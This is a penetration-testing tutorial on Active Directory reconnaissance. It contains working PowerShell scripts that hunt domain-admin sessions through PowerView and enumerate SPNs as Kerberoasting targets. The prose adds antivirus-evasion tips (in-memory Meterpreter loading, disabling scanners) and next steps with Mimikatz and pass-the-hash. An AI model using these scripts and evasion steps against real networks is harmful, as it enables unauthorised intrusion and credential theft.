Introduction

In this tutorial, I’m going to walk you through some key techniques for Active Directory penetration testing. I’ve noticed there aren’t a lot of great video resources out there on this topic, so I wanted to share my process for enumerating logged-in users and discovering services running on a domain controller.

Finding Out Who’s Logged In

First, I’ll show you how to figure out which users are currently logged into the network. For this, I use a fantastic script called PowerView.

  • Getting the Script: You can grab PowerView from GitHub (it is part of the PowerSploit project). A quick heads-up: your antivirus will almost certainly flag the file as malicious, so on your own attack box you may need to add an exclusion or disable the scanner temporarily just to download and keep the script.
  • A Note for Real-World Scenarios: If you’ve already gained a foothold on a Windows machine within the network, I highly recommend loading Meterpreter’s PowerShell extension (load powershell) and then importing PowerView with powershell_import. That way the script runs inside your existing session’s process instead of being written to disk and launched through powershell.exe. If you try to run PowerShell scripts directly on the box, you’re much more likely to get caught by antivirus software, and all your hard work will be for nothing.
  • The Commands:
    • Get-NetLoggedOn: This queries a single host (NetWkstaUserEnum under the hood) and tells you who is logged on to that machine. It is useful for the specific machine you’ve compromised or for a handful of interesting hosts, but it needs local administrator rights on the target, so I wouldn’t recommend spraying it across every machine in the domain.
    • Get-NetSession: This is the real powerhouse. Point it at the domain controller (Get-NetSession -ComputerName DC01) and it lists the SMB sessions open on that DC (NetSessionEnum), giving you the username, the source machine name or IP address, and idle times. Because almost every domain user touches SYSVOL and NETLOGON on a DC, this one query shows you who is active and where they are coming from, which is how you spot high-value targets like system administrators. Note that newer Windows builds restrict NetSessionEnum to administrators by default, so the list may be empty from an unprivileged account.
  • What’s Next? Once I’ve identified a logged-in administrator and the machine they are on, my next move is to get local administrator or SYSTEM on that machine and use a tool like Mimikatz to dump their credentials from LSASS. I can then take those hashes offline and try to crack them, or use the NTLM hash directly in a pass-the-hash attack, to gain full administrative access.
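The session-hunting workflow above, written out as one PowerShell script. This is an added example, not code from the video or from PowerView itself; it assumes PowerView (current dev-branch function names: Get-DomainController, Get-DomainGroupMember, Get-NetSession, Get-NetLoggedOn) is already loaded in the session, and the group name 'Domain Admins' is an assumption you would swap for whatever group matters in the target domain.

```powershell
# Added example (not from the original post or PowerView): find which hosts
# members of a privileged group currently have sessions from.
# Assumes PowerView is loaded, e.g.  IEX (Get-Content .\PowerView.ps1 -Raw)
# or, inside Meterpreter:  load powershell ; powershell_import PowerView.ps1
# The group name below is an assumption; adjust for the target domain.
$Group = 'Domain Admins'

# 1. Target list: SAM account names of the privileged group (nested groups included).
$Admins = Get-DomainGroupMember -Identity $Group -Recurse |
          Select-Object -ExpandProperty MemberName

# 2. Ask every domain controller for its open SMB sessions (NetSessionEnum).
#    Users touching SYSVOL/NETLOGON appear here with the host they came from,
#    so the DCs act as a collection point for the whole domain.
$Sessions = foreach ($DC in Get-DomainController) {
    Get-NetSession -ComputerName $DC.Name -ErrorAction SilentlyContinue |
        Where-Object { $_.UserName -and -not $_.UserName.EndsWith('$') } |   # drop machine accounts
        Select-Object @{n='DC';e={$DC.Name}}, UserName, CName, Time, IdleTime
}

# 3. Keep only sessions that belong to the privileged users.
$AdminSessions = $Sessions | Where-Object { $Admins -contains $_.UserName }
$AdminSessions | Format-Table -AutoSize

# 4. For each source host, confirm who is actually logged on (NetWkstaUserEnum).
#    Get-NetLoggedOn needs local admin on that host; hosts that refuse are skipped.
$SourceHosts = $AdminSessions.CName |
               ForEach-Object { $_.TrimStart('\') } |
               Sort-Object -Unique
foreach ($Src in $SourceHosts) {
    Get-NetLoggedOn -ComputerName $Src -ErrorAction SilentlyContinue |
        Select-Object @{n='Host';e={$Src}}, UserName, LogonDomain
}
```

The hosts printed in step 4 are where you would need local administrator rights to run Mimikatz against the admin’s session. PowerView bundles a similar loop as Find-DomainUserLocation (Invoke-UserHunter in older releases); writing it out by hand makes it clearer which call needs which privilege, and which one goes to the DC versus to the workstation.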

Discovering Running Services with SPNs

Next, I’ll show you how to discover Service Principal Names (SPNs). Think of an SPN as the link between a service instance (like a web server or email server on a particular host) and the Active Directory account that runs it, which can be either a computer account or a regular user account. Kerberos uses that mapping to know which account’s key to encrypt a service ticket with.

  • Why Bother with SPNs? By enumerating SPNs, I can get a clear picture of all the services running on the system, such as IIS, Exchange, DNS, or FTP.
  • How to Do It: I use another offensive security script for this. Under the hood it is just an LDAP query, so I only need to modify the script’s search filter to tell it which service I’m interested in. For example, the filter (servicePrincipalName=*) returns every account with an SPN, and (servicePrincipalName=DNS/*) narrows it to DNS only; swap in HTTP, MSSQLSvc, ftp and so on as needed.
  • What You’ll Find: The output from this script is incredibly valuable. It gives me the service class and host from the SPN itself, and the account the SPN is registered to, which is the account the service runs as. Because the result also carries the account’s distinguished name, I can see which organizational unit it lives in, which helps me understand whether it’s a high-priority target.
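The SPN search described above, done with plain .NET and no PowerView dependency. This is an added example and not the script from the video; it assumes the machine is domain-joined (DirectorySearcher then binds to the current domain automatically), and the service class 'DNS' is an assumption you change to whatever service you are hunting.

```powershell
# Added example (not the script from the video): enumerate SPNs over LDAP and
# show which account runs each service and which OU that account sits in.
# Assumes a domain-joined host; $ServiceClass is an assumption ('*' lists everything).
$ServiceClass = 'DNS'

$Searcher = New-Object System.DirectoryServices.DirectorySearcher
# The filter is the only thing to change per service: any object whose SPN
# starts with "<class>/" (e.g. DNS/dc01.corp.local).
$Searcher.Filter   = "(servicePrincipalName=$ServiceClass/*)"
$Searcher.PageSize = 1000                      # page results so large domains don't truncate
'samaccountname','serviceprincipalname','distinguishedname' |
    ForEach-Object { [void]$Searcher.PropertiesToLoad.Add($_) }

$Results = $Searcher.FindAll() | ForEach-Object {
    $p   = $_.Properties
    $sam = [string]$p['samaccountname'][0]
    $dn  = [string]$p['distinguishedname'][0]
    [pscustomobject]@{
        Account     = $sam
        # Computer accounts end in '$'; a user account here has a human-chosen password.
        AccountType = if ($sam.EndsWith('$')) { 'computer' } else { 'user' }
        # Everything after the leaf CN is the container, e.g. OU=Servers,DC=corp,DC=local.
        OU          = ($dn -split ',(?=(?:OU|DC|CN)=)' | Select-Object -Skip 1) -join ','
        # Only the SPNs of the requested class; an account may hold several.
        SPNs        = ($p['serviceprincipalname'] | Where-Object { $_ -like "$ServiceClass/*" }) -join '; '
    }
}
$Results | Sort-Object AccountType, Account | Format-Table -AutoSize -Wrap
```

The same query can be run without any script at all with the built-in setspn.exe, e.g. setspn -Q DNS/*, but it does not give you the account type or OU. Pay particular attention to rows where AccountType is user: a service SPN registered on a user account means a human-managed password is protecting that service, which is the precondition for the Kerberoasting attack as well as an obvious place to look for weak passwords.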

Putting It All Together: The Attack Plan

The whole point of all this enumeration is to gather as much intelligence as possible—users, groups, logged-in users, running services, etc.—so I can formulate a solid attack plan.

For example, if I find a logged-in admin, I’ll go after their password hashes. If I find services like FTP or HTTP running, I can try to escalate my attack through web application vulnerabilities or brute-force attacks.

I’ll wrap up by reminding you to always save these scripts locally and use Metasploit to run them in a real-world scenario to stay under the radar. In my next video, I’ll show you how to take the next step: dumping those admin hashes and gaining full control of the Active Directory. Stay tuned!

Video Walk-through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.